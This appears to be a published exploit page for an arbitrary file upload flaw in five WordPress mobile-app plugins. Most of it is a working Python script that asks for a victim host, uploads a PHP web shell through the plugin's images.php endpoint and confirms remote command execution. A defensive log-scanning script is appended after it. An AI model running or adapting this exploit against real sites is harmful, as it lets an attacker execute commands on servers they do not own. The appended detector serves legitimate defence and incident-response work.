WordPress Multiple Plugins - Arbitrary File Upload
Source: http://www.vapidlabs.com  Author: Martian  Published: 2017-03-07
import requests
import random
import string
print "---------------------------------------------------------------------"
print "Multiple  Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
print "---------------------------------------------------------------------"
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
if plug_choice=="1":
    plugin="zen-mobile-app-native"
elif plug_choice=="2":
    plugin="webapp-builder"
elif plug_choice=="3":
    plugin="wp2android-turn-wp-site-into-android-app"
elif plug_choice=="4":
    plugin="mobile-app-builder-by-wappress"
elif plug_choice=="5":
    plugin="mobile-friendly-app-builder-by-easytouch"
else:
    print "Invalid Plugin choice, I will now exit"
    quit() 
slug = "/wp-content/plugins/"+plugin+"/server/images.php"
target=victim+slug
def definShell(size=6, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
shellName= definShell()+".php"
 
def checkExistence():
    litmusTest = requests.get(target)
    litmusState = litmusTest.status_code
    if litmusState == 200:
        print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
        exploit()
    else:
        print "Target has a funny code & might not be vulnerable, I will now exit\n"
        quit()
    
def exploit():
    print "\nGenerating Payload: "+shellName+"\n"
    myShell = {'file': (shellName, '<?php echo system($_GET[\'alien\']); ?>')}
    shellEmUp = requests.post(target, files=myShell)
    respShell = shellEmUp.text
    cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
    shellLoc = cleanURL.replace(" ", "")
    print "Confirming shell upload by printing current user\n"
    shellTest=requests.get(shellLoc+"?alien=whoami")
    webserverUser=shellTest.text
    if webserverUser == "":
        print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
        quit()
    else:
        print "The current webserver user is: "+webserverUser+"\n"
        print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
        quit()
 
if __name__ == "__main__":
    checkExistence()
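
Added example (not part of the original script or the Vapid Labs advisories): a log check a defender can run for the requests this script makes, namely requests to `server/images.php` in the five plugin directories and later hits on a six-character uppercase/digit `.php` file beneath them. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Plugin directory names taken from the script on this page.
PLUGINS = (
    "zen-mobile-app-native",
    "webapp-builder",
    "wp2android-turn-wp-site-into-android-app",
    "mobile-app-builder-by-wappress",
    "mobile-friendly-app-builder-by-easytouch",
)
BASE = r"/wp-content/plugins/(?P<plugin>%s)/" % "|".join(map(re.escape, PLUGINS))
# Assumption: access logs are in Apache/nginx combined format.
REQ = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ENDPOINT = re.compile(BASE + r"server/images\.php(?:\?|$)")
# The script names its upload with six uppercase letters/digits plus ".php".
DROPPED = re.compile(BASE + r"(?:[^?\s]*/)?[A-Z0-9]{6}\.php(?:\?|$)")


def classify(line):
    """Return (ip, plugin, finding) for a suspicious log line, else None."""
    m = REQ.match(line)
    if not m:
        return None
    ip, method, path, status = m.group("ip", "method", "path", "status")
    hit = ENDPOINT.search(path)
    if hit:
        kind = "upload-post" if method == "POST" else "endpoint-probe"
        return (ip, hit.group("plugin"), "%s-%s" % (kind, status))
    hit = DROPPED.search(path)
    if hit and status == "200":
        return (ip, hit.group("plugin"), "uploaded-php-served")
    return None

def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, made-up file and directory names).
SAMPLE = [
    '203.0.113.7 - - [07/Mar/2017:10:00:01 +0000] "GET /wp-content/plugins/webapp-builder/server/images.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [07/Mar/2017:10:00:02 +0000] "POST /wp-content/plugins/webapp-builder/server/images.php HTTP/1.1" 200 71',
    '203.0.113.7 - - [07/Mar/2017:10:00:03 +0000] "GET /wp-content/plugins/webapp-builder/images/K3J9QZ.php?alien=whoami HTTP/1.1" 200 9',
    '198.51.100.4 - - [07/Mar/2017:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2400',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The filename pattern is a heuristic: a legitimate plugin file with a six-character uppercase name would also match, so treat `uploaded-php-served` as a lead to confirm on disk.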
 